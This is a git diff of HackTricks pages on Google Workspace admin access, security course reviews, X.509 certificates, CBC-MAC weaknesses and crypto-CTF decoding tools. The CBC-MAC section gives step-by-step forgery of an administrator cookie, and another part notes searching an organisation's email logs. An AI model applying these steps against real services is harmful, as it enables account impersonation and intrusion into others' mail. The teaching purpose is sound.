The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declare some other scope. The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declare some other scope.
### **Administrate Workspace** ## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization. In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization.
You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch) You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
## Account Compromised Recovery # Account Compromised Recovery
* Log out of all sessions * Log out of all sessions
* Change user password * Change user password
@ -233,7 +231,7 @@ You can also search emails through all the users invoices in [**https://admin.go
* Remove bad Android Apps * Remove bad Android Apps
* Remove bad account delegations * Remove bad account delegations
## References # References
* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic * [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? * [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# INE Courses and eLearnSecurity Certifications Reviews # eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses
## eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses ## Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**. This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**.
@ -30,7 +28,7 @@ I found the course to be a great one for **people that don't have any experience
Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\ Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks. Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks.
### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting) ## Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)
When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\ When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.** However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.**
@ -38,7 +36,7 @@ However, there is a very important difference with the Android course, if you wa
As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**.\ As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks. Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks.
### [eMAPT](https://elearnsecurity.com/product/emapt-certification/) ## [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
> The eLearnSecurity Mobile Application Penetration Tester (eMAPT) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam. > The eLearnSecurity Mobile Application Penetration Tester (eMAPT) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam.
@ -50,16 +48,16 @@ Having done the [**INE course about Android applications pentesting**](https://m
In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**. In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**.
## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related # eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme) ## Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)
This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \ This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities. Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did. I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/) ## [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
> The eLearnSecurity Web Application Penetration Tester eXtreme (eWAPTX) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INEs cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass. > The eLearnSecurity Web Application Penetration Tester eXtreme (eWAPTX) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INEs cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.
@ -68,24 +66,24 @@ The exam was composed of a **few web applications full of vulnerabilities**. In
**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities. **All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities.
## Course: **Data Science on the Google Cloud Platform** # Course: **Data Science on the Google Cloud Platform**
\ \
It's a very interesting basic course about **how to use the ML environment provided by Google** using services such as big-query (to store al load results), Google Deep Learning APIs (Google Vision API, Google Speech API, Google Natural Language API and Google Video Intelligence API) and even how to train your own model. It's a very interesting basic course about **how to use the ML environment provided by Google** using services such as big-query (to store al load results), Google Deep Learning APIs (Google Vision API, Google Speech API, Google Natural Language API and Google Video Intelligence API) and even how to train your own model.
## Course: **Machine Learning with scikit-learn Starter Pass** # Course: **Machine Learning with scikit-learn Starter Pass**
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.
It's definitely recommended for people that haven't use scikit-learn (but know python) It's definitely recommended for people that haven't use scikit-learn (but know python)
## **Course: Classification Algorithms** # **Course: Classification Algorithms**
The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**. The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
It also shows how to **create models** with with **scikit-learn.** It also shows how to **create models** with with **scikit-learn.**
## Course: **Decision Trees** # Course: **Decision Trees**
The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/decision-trees) was very useful to improve my knowledge about **Decision and Regressions Trees**, **when** are they **useful**, **how** they **work** and how to properly **tune them**. The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/decision-trees) was very useful to improve my knowledge about **Decision and Regressions Trees**, **when** are they **useful**, **how** they **work** and how to properly **tune them**.
@ -93,7 +91,7 @@ It also explains **how to create tree models** with scikit-learn different techn
The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**. The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**.
## #
<details> <details>

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Certificates # What is a Certificate
## What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@ -27,7 +25,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
## x509 Common Fields # x509 Common Fields
* **Version Number:** Version of x509 format. * **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. * **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@ -70,13 +68,13 @@ The most common format for public key certificates is defined by [X.509](https:/
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
* **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate
### Difference between OSCP and CRL Distribution Points ## Difference between OSCP and CRL Distribution Points
**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\ **OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\ **CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.). From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
### What is Certificate Transparency ## What is Certificate Transparency
Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals: Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals:
@ -84,19 +82,19 @@ Certificate Transparency aims to remedy certificate-based threats by **making th
* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued. * Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued.
* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued. * **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued.
#### **Certificate Logs** ### **Certificate Logs**
Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesnt have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party. Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesnt have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party.
#### Query ### Query
You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh). You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh).
## Formats # Formats
There are different formats that can be used to store a certificate. There are different formats that can be used to store a certificate.
#### **PEM Format** ### **PEM Format**
* It is the most common format used for certificates * It is the most common format used for certificates
* Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\ * Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\
@ -104,7 +102,7 @@ There are different formats that can be used to store a certificate.
\- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\ \- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\
\- Apache and similar server uses PEM format certificates \- Apache and similar server uses PEM format certificates
#### **DER Format** ### **DER Format**
* The DER format is the binary form of the certificate * The DER format is the binary form of the certificate
* All types of certificates & private keys can be encoded in DER format * All types of certificates & private keys can be encoded in DER format
@ -112,19 +110,19 @@ There are different formats that can be used to store a certificate.
* DER formatted certificates most often use the .cer and '.der' extensions * DER formatted certificates most often use the .cer and '.der' extensions
* DER is typically used in Java Platforms * DER is typically used in Java Platforms
#### **P7B/PKCS#7 Format** ### **P7B/PKCS#7 Format**
* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c * The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c
* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key * A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key
* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat * The most common platforms that support P7B files are Microsoft Windows and Java Tomcat
#### **PFX/P12/PKCS#12 Format** ### **PFX/P12/PKCS#12 Format**
* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file * The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file
* These files usually have extensions such as .pfx and .p12 * These files usually have extensions such as .pfx and .p12
* They are typically used on Windows machines to import and export certificates and private keys * They are typically used on Windows machines to import and export certificates and private keys
### Formats conversions ## Formats conversions
**Convert x509 to PEM** **Convert x509 to PEM**
@ -132,7 +130,7 @@ There are different formats that can be used to store a certificate.
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
``` ```
#### **Convert PEM to DER** ### **Convert PEM to DER**
``` ```
openssl x509 -outform der -in certificatename.pem -out certificatename.der openssl x509 -outform der -in certificatename.pem -out certificatename.der

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Cipher Block Chaining CBC-MAC # CBC
## CBC
If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
## CBC-MAC # CBC-MAC
In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher. In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher.
@ -31,7 +29,7 @@ To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero init
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) ![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
## Vulnerability # Vulnerability
With CBC-MAC usually the **IV used is 0**.\ With CBC-MAC usually the **IV used is 0**.\
This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
@ -55,19 +53,19 @@ You can create a username called **Administ** (m1) and retrieve the signature (s
Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
now, you can use s32 as the signature of the full name **Administrator**. now, you can use s32 as the signature of the full name **Administrator**.
#### Summary ### Summary
1. Get the signature of username **Administ** (m1) which is s1 1. Get the signature of username **Administ** (m1) which is s1
2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** 2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. 3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
## Attack Controlling IV # Attack Controlling IV
If you can control the used IV the attack could be very easy.\ If you can control the used IV the attack could be very easy.\
If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
## References # References
More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Crypto CTFs Tricks # Online Hashes DBs
## Online Hashes DBs
* _**Google it**_ * _**Google it**_
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) * [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
@ -33,33 +31,33 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## Magic Autosolvers # Magic Autosolvers
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
## Encoders # Encoders
Most of encoded data can be decoded with these 2 ressources: Most of encoded data can be decoded with these 2 ressources:
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### Substitution Autosolvers ## Substitution Autosolvers
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
* [https://quipqiup.com/](https://quipqiup.com) - Very good ! * [https://quipqiup.com/](https://quipqiup.com) - Very good !
#### Caesar - ROTx Autosolvers ### Caesar - ROTx Autosolvers
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) * [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
#### Atbash Cipher ### Atbash Cipher
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
### Base Encodings Autosolver ## Base Encodings Autosolver
Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
@ -132,7 +130,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
[http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) [http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
### HackerizeXS \[_╫Λ↻├☰┏_] ## HackerizeXS \[_╫Λ↻├☰┏_]
``` ```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ ╫☐↑Λ↻Λ┏Λ↻☐↑Λ
@ -140,7 +138,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
* [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) * [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
### Morse ## Morse
``` ```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
@ -148,7 +146,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
* [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) * [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder ## UUencoder
``` ```
begin 644 webutils_pl begin 644 webutils_pl
@ -161,7 +159,7 @@ end
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
### XXEncoder ## XXEncoder
``` ```
begin 644 webutils_pl begin 644 webutils_pl
@ -172,7 +170,7 @@ end
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder ## YEncoder
``` ```
=ybegin line=128 size=28 name=webutils_pl =ybegin line=128 size=28 name=webutils_pl
@ -182,7 +180,7 @@ ryvkryvkryvkryvkryvkryvkryvk
